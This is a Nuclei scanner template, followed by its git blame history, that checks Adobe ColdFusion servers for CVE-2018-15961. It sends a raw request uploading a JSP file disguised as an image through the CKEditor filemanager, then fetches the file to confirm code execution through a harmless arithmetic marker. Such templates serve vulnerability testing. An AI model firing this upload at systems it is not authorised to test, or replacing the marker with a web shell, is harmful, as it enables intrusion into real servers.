nuclei-templates/cves/2018/CVE-2018-15961.yaml

id: CVE-2018-15961

info:
  name: CVE-2018-15961
  author: SkyLark-Lab,ImNightmaree
  severity: critical
  reference:
    - https://github.com/vah13/CVE-2018-15961
    - https://www.cvedetails.com/cve/CVE-2018-15961/
  tags: adobe,cve,cve2018,rce,coldfusion,fileupload

requests:
  - raw:
      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------24464570528145

        -----------------------------24464570528145
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
        Content-Type: image/jpeg

        <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%>
        -----------------------------24464570528145
        Content-Disposition: form-data; name="path"

        {{randstr}}.jsp
        -----------------------------24464570528145--

  - method: GET
    path:
      - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"

    matchers-condition: and
    matchers:

      - type: word
        part: body
        words:
          - "18188751"

      - type: status
        status:
          - 200
Linting 2021-11-10 18:08:18 +00:00			`id: CVE-2018-15961`
Linting 2021-11-10 18:05:59 +00:00
Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00			`info:`
			`name: CVE-2018-15961`
Missed a space on author. 2021-11-10 17:51:54 +00:00			`author: SkyLark-Lab,ImNightmaree`
Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00			`severity: critical`
Update CVE-2018-15961.yaml 2021-11-11 06:21:24 +00:00			`reference:`
			`- https://github.com/vah13/CVE-2018-15961`
			`- https://www.cvedetails.com/cve/CVE-2018-15961/`
			`tags: adobe,cve,cve2018,rce,coldfusion,fileupload`
Linting 2021-11-10 18:05:59 +00:00
Linting 2021-11-10 18:14:05 +00:00			`requests:`
Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00			`- raw:`
Linting 2021-11-10 18:14:05 +00:00			`- \|`
			`POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=---------------------------24464570528145`
Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00
Linting 2021-11-10 18:14:05 +00:00			`-----------------------------24464570528145`
Update CVE-2018-15961.yaml 2021-11-11 06:21:24 +00:00			`Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"`
Linting 2021-11-10 18:14:05 +00:00			`Content-Type: image/jpeg`
Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00
Update CVE-2018-15961.yaml 2021-11-11 06:21:24 +00:00			`<%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%>`
Linting 2021-11-10 18:14:05 +00:00			`-----------------------------24464570528145`
			`Content-Disposition: form-data; name="path"`
Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00
Update CVE-2018-15961.yaml 2021-11-11 06:21:24 +00:00			`{{randstr}}.jsp`
Linting 2021-11-10 18:14:05 +00:00			`-----------------------------24464570528145--`
Update CVE-2018-15961.yaml 2021-11-11 06:21:24 +00:00
Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"`

			`matchers-condition: and`
			`matchers:`

			`- type: word`
Update CVE-2018-15961.yaml 2021-11-11 06:21:24 +00:00			`part: body`
Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00			`words:`
Update CVE-2018-15961.yaml 2021-11-11 06:21:24 +00:00			`- "18188751"`

Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably 2021-11-10 17:46:34 +00:00			`- type: status`
			`status:`
			`- 200`